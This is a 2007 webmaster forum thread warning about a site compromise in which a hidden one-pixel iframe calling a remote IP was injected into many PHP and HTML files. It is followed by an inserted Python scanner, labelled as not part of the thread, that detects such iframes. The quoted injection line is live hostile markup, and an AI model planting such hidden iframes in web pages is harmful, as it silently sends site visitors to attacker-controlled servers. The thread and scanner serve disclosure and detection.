  #1  
09-25-2007, 05:49 AM
JD45
Join Date: Feb 2006
Posts: 138
Webmasters Beware!

Recently we noticed a full screen LG ad on our website. We only run Tribal Fusion and IntelliTxt and neither of those should be displaying a full screen ad.

We looked into it and this code was added to MANY of our php and html files:

Code:
<.iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'><./iframe>

The IP that illegally accessed our FTP is: 81.95.149.75

That IP comes back registered to Panama. I've already sent the abuse email a letter with proof. It appears we were somehow exploited and a mass script ran adding the code at the bottom of the files affected.

Just FYI for all.
Reply With Quote
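
A scan for the kind of injection described in the post above, as an added example that is not part of the original thread: it walks a web root and reports PHP/HTML files that contain an invisible iframe with a remote src, noting whether the tag sits near the end of the file. The function names, the 512-character tail window and the sample files (built around the documentation address 192.0.2.10) are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

WEB_EXTENSIONS = {".php", ".html", ".htm"}
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# Remote src (absolute or protocol-relative), and attributes that hide a frame.
REMOTE_SRC_RE = re.compile(r"""src\s*=\s*['"]?((?:https?:)?//[^'"\s>]+)""", re.I)
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*=\s*['"]?[01](?:px)?['"]?(?=[\s>/])"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none""", re.I)


def find_hidden_iframes(text):
    """Return (offset, src) for each invisible iframe that loads a remote URL."""
    hits = []
    for tag in IFRAME_RE.finditer(text):
        src = REMOTE_SRC_RE.search(tag.group(0))
        if src and HIDDEN_RE.search(tag.group(0)):
            hits.append((tag.start(), src.group(1)))
    return hits


def scan_webroot(root, tail_chars=512):
    """Map relative path -> [(src, near_end_of_file)] for suspicious frames."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            text = path.read_text(encoding="utf-8", errors="replace")
            hits = find_hidden_iframes(text)
            if hits:
                report[path.relative_to(root).as_posix()] = [
                    (src, len(text) - off <= tail_chars) for off, src in hits]
    return report


def demo():
    """Scan a constructed web root; 192.0.2.10 is a documentation address."""
    injected = ("<iframe src='http://192.0.2.10/t.php' width='1' height='1' "
                "style='visibility:hidden'></iframe>")
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text("<?php echo 'home'; ?>\n" + injected)
        Path(root, "about.html").write_text("<html><body>About</body></html>\n")
        Path(root, "video.html").write_text(
            "<iframe src='https://example.com/v' width='560' height='315'></iframe>")
        return scan_webroot(root)


if __name__ == "__main__":
    print(demo())
```

A visible embed such as the 560x315 frame in video.html is not reported; only frames that are both remote and hidden are. Comparing file modification times against the FTP log is a useful follow-up for any file the scan flags.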
  #2  
09-25-2007, 08:19 AM
manilodisan
Join Date: Dec 2006
Posts: 9

How did it access your files? Can you share the story?
Reply With Quote
  #3  
09-25-2007, 02:36 PM
SEOvB
Join Date: May 2007
Location: Indianapolis
Posts: 2,451

Obviously his server was compromised due to an exploit in some software being run.
Reply With Quote
  #4  
09-25-2007, 02:56 PM
JD45
Join Date: Feb 2006
Posts: 138

Quote:
Originally Posted by FRDS
Obviously his server was compromised due to an exploit in some software being run.

exactly
Reply With Quote
  #5  
09-25-2007, 03:44 PM
SEOvB
Join Date: May 2007
Location: Indianapolis
Posts: 2,451

Just wondering what all software besides vBulletin are you currently running?
Reply With Quote
  #6  
09-25-2007, 05:05 PM
JD45
Join Date: Feb 2006
Posts: 138

Quote:
Originally Posted by FRDS
Just wondering what all software besides vBulletin are you currently running?

No other 'official' software or scripts. Our entire site besides vb is custom coded in php. Actually I take that back, we do run vbseo as well.


It doesn't seem as if it was directed to the forums, but more so PHP overall.
Reply With Quote
  #7  
09-25-2007, 05:15 PM
Marco van Herwaarden
Join Date: Jul 2004
Posts: 25,415

Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files were changed from another account on the same server.
Reply With Quote
  #8  
09-25-2007, 05:51 PM
JD45
Join Date: Feb 2006
Posts: 138

Quote:
Originally Posted by Marco van Herwaarden
Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files were changed from another account on the same server.

We're on a dedi server, but having ftp/shell access is a possibility.

I have to say it was pretty unique. First time I've seen anyone access a site and modify php files for a monetary gain.
Reply With Quote
  #9  
09-25-2007, 06:17 PM
Marco van Herwaarden
Join Date: Jul 2004
Posts: 25,415

That happens all the time.

"Hackers" are not anymore what they used to be (just hacking for the thrill/kick). Hacks and exploits are being sold these days for commercial purposes.
Reply With Quote